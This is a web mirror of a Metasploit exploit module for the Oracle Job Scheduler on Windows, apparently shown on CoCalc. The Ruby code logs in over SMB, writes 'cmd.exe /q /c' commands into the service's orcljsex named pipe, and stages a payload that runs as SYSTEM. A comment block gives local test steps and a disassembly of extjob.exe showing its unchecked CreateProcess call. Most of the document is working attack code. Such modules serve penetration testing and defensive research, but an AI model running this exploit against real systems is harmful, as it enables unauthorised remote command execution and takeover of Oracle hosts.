CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/oracle/extjob.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::SMB::Client

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'Oracle Job Scheduler Named Pipe Command Execution',

15
      'Description'    => %q{

16
          This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job

17
        Scheduler is implemented via the component extjob.exe which listens on a named pipe

18
        called "orcljsex<SID>" and execute arbitrary commands received over this channel via

19
        CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.

20
        Note that the Job Scheduler is disabled in default installations.

21
      },

22
      'Author'         =>

23
        [

24
          'David Litchfield', # Vulnerability discovery and exploit

25
          'juan vazquez',     # Metasploit module

26
          'sinn3r'            # Metasploit fu

27
        ],

28
      'License'        => MSF_LICENSE,

29
      'References'     =>

30
        [

31
          [ 'URL', 'http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221' ],

32
        ],

33
      'Payload'        =>

34
        {

35
          'Space'    => 2048,

36
        },

37
      'Platform'       => 'win',

38
      # This module has been tested on Oracle 10g Release 1

39
      # where the Oracle Job Scheduler runs as SYSTEM on Windows

40
      'Targets'        => [['Automatic',{}]],

41
      'CmdStagerFlavor' => 'vbs',

42
      'Privileged'     => true,

43
      'DisclosureDate' => '2007-01-01',

44
      'DefaultTarget'  => 0))

45


46
    register_options(

47
      [

48
        OptString.new('SID', [ true, 'The database sid', 'ORCL'])

49
      ])

50


51
  end

52


53
  def exploit

54
    if check == Exploit::CheckCode::Vulnerable

55
      print_status("Exploiting through \\\\#{datastore['RHOST']}\\orcljsex#{datastore['SID']} named pipe...")

56
      execute_cmdstager({:linemax => 1500})

57
      handler

58
    else

59
      print_error "Host does not appear to be vulnerable!"

60
    end

61
  end

62


63
  def execute_command(cmd, opts)

64
    connect()

65
    smb_login()

66
    pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")

67
    pipe.write("cmd.exe /q /c #{cmd}")

68
    pipe.close

69
    disconnect

70
  end

71


72
  def check

73


74
    begin

75
      connect()

76
      smb_login()

77
      pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")

78
      pipe.write("cmd.exe /q /c dir")

79
      result = pipe.read() # Exit Code

80
      pipe.close

81
      disconnect

82
    rescue

83
      return Exploit::CheckCode::Safe

84
    end

85


86
    if result == "1" # Exit Code should be 1

87
      return Exploit::CheckCode::Vulnerable

88
    end

89


90
    return Exploit::CheckCode::Safe

91


92
  end

93
end

94


95
=begin

96
How To Test locally:

97
1. Go to Administrative Tools -> Services -> Set 'OracleJobSchedulerORCL' to automatic, and

98
   then Start the service.

99
2. Make sure you know your SMBUser and SMBPass

100
3. Run:

101
   C:\Documents and Settings\juan\PipeList>echo cmd.exe /c calc.exe > \\.\pipe\orcljsexorcl

102


103
Code Analysis of extjob.exe (Oracle 10g Release 1)

104
=================================================

105


106
From _ServiceStart():

107


108
* Create Named Pipe and store handle on "esi":

109


110
.text:004017EC                 push    offset _pipename

111
.text:004017F1                 lea     ecx, [ebp+Name]

112
.text:004017F7                 push    offset $SG59611 ; "\\\\.\\pipe\\orcljsex%s"

113
.text:004017FC                 push    ecx

114
.text:004017FD                 jmp     short loc_401810

115
.text:004017FF ; ---------------------------------------------------------------------------

116
.text:004017FF

117
.text:004017FF loc_4017FF:                             ; CODE XREF: _ServiceStart+FAj

118
.text:004017FF                 push    offset $SG59613

119
.text:00401804                 lea     edx, [ebp+Name]

120
.text:0040180A                 push    offset $SG59614 ; "\\\\.\\pipe\\orcljsex%s"

121
.text:0040180F                 push    edx             ; Dest

122
.text:00401810

123
.text:00401810 loc_401810:                             ; CODE XREF: _ServiceStart+10Dj

124
.text:00401810                 call    ds:__imp__sprintf

125
.text:00401816                 add     esp, 0Ch

126
.text:00401819                 push    edi

127
.text:0040181A                 push    edi

128
.text:0040181B                 push    4

129
.text:0040181D                 call    _ReportStatusToSCMgr

130
.text:00401822                 add     esp, 0Ch

131
.text:00401825                 test    eax, eax

132
.text:00401827                 jz      loc_4018EC

133
.text:0040182D                 mov     edi, ds:__imp__CreateNamedPipeA@32 ; CreateNamedPipeA(x,x,x,x,x,x,x,x)

134
.text:0040185C                 mov     esi, eax

135


136
* Connect Named Pipe

137


138
.text:0040188F                 push    eax             ; lpOverlapped

139
.text:00401890                 push    esi             ; hNamedPipe

140
.text:00401891                 call    ds:__imp__ConnectNamedPipe@8 ; ConnectNamedPipe(x,x)

141


142
* Create Thread with ExecMain() as lpStartAddress and esi (The Pipe handle) as parameter

143


144
.text:004018B9                 lea     edx, [ebp+ThreadId]

145
.text:004018BC                 push    edx             ; lpThreadId

146
.text:004018BD                 push    0               ; dwCreationFlags

147
.text:004018BF                 push    esi             ; lpParameter

148
.text:004018C0                 push    offset _ExecMain ; lpStartAddress

149
.text:004018C5                 push    0               ; dwStackSize

150
.text:004018C7                 push    0               ; lpThreadAttributes

151
.text:004018C9                 call    ds:__imp__CreateThread@24 ; CreateThread(x,x,x,x,x,x)

152


153
From ExecMain():

154


155
* Stores Named Pipe Handle in ebx

156


157
.text:0040197C                 mov     ebx, [ebp+hObject]

158


159
* Read From Named Pipe

160


161
.text:004019C4                 lea     eax, [ebp+NumberOfBytesRead]

162
.text:004019C7                 push    edx             ; lpOverlapped

163
.text:004019C8                 push    eax             ; lpNumberOfBytesRead

164
.text:004019C9                 lea     ecx, [ebp+Buffer]

165
.text:004019CF                 push    10000h          ; nNumberOfBytesToRead

166
.text:004019D4                 push    ecx             ; lpBuffer

167
.text:004019D5                 push    ebx             ; hFile

168
.text:004019D6                 call    ds:__imp__ReadFile@20 ; ReadFile(x,x,x,x,x)

169


170
* CreateProcess with lpCommandLine full controlled by the user input

171


172
.text:00401A06                 mov     ecx, 11h

173
.text:00401A0B                 xor     eax, eax

174
.text:00401A0D                 lea     edi, [ebp+StartupInfo]

175
.text:00401A10                 push    esi

176
.text:00401A11                 rep stosd

177
.text:00401A13                 lea     eax, [ebp+ProcessInformation]

178
.text:00401A16                 lea     ecx, [ebp+StartupInfo]

179
.text:00401A19                 push    eax             ; lpProcessInformation

180
.text:00401A1A                 push    ecx             ; lpStartupInfo

181
.text:00401A1B                 push    0               ; lpCurrentDirectory

182
.text:00401A1D                 push    0               ; lpEnvironment

183
.text:00401A1F                 push    0               ; dwCreationFlags

184
.text:00401A21                 push    0               ; bInheritHandles

185
.text:00401A23                 push    0               ; lpThreadAttributes

186
.text:00401A25                 lea     edx, [ebp+Buffer]

187
.text:00401A2B                 push    0               ; lpProcessAttributes

188
.text:00401A2D                 push    edx             ; lpCommandLine

189
.text:00401A2E                 push    0               ; lpApplicationName

190
.text:00401A30                 mov     [ebp+StartupInfo.cb], 44h

191
.text:00401A37                 mov     [ebp+StartupInfo.wShowWindow], 5

192
.text:00401A3D                 mov     [ebp+StartupInfo.dwFlags], 100h

193
.text:00401A44                 mov     [ebp+StartupInfo.lpDesktop], offset $SG59671

194
.text:00401A4B                 call    ds:__imp__CreateProcessA@40 ; CreateProcessA(x,x,x,x,x,x,x,x,x,x)

195


196


197
=end

198


199